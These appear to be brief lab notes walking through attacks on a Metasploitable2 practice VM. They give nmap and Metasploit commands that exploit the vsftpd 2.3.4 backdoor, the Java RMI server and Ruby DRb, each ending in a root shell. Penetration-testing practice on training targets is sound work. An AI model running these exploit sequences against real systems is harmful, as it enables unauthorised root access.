(WARNING: ongoing and many outright spoilers!)

192.168.5.88 is the example Metasploitable2 target:

VSFTPD:

• Used ‘nmap –script ftp-vsftpd-backdoor -p 21 192.168.5.88’ to confirm
  • Used msfconsole:
    • ‘use exploit/unix/ftp/vsftpd_234_backdoor’
    • ‘set RHOSTS 192.168.5.88’
    • ‘exploit’
    • …got shell as root

GNU Classpath RMI Registry:

• Used msfconsole:
  • ‘use exploit/multi/misc/java_rmi_server’
  • ‘set RHOSTS 192.168.5.88’
  • ‘set RPORT 1099’
  • ‘set TARGET 0’
  • ‘run’
  • …got meterpreter shell as root

Ruby DRb RMI

• Used msfconsole:
  • ‘use exploit/linux/misc/drb_remote_codeexec’
  • ‘set URI druby://192.168.5.88:8787’
  • ‘run’
  • …got shell as root

To be continued…

…Get back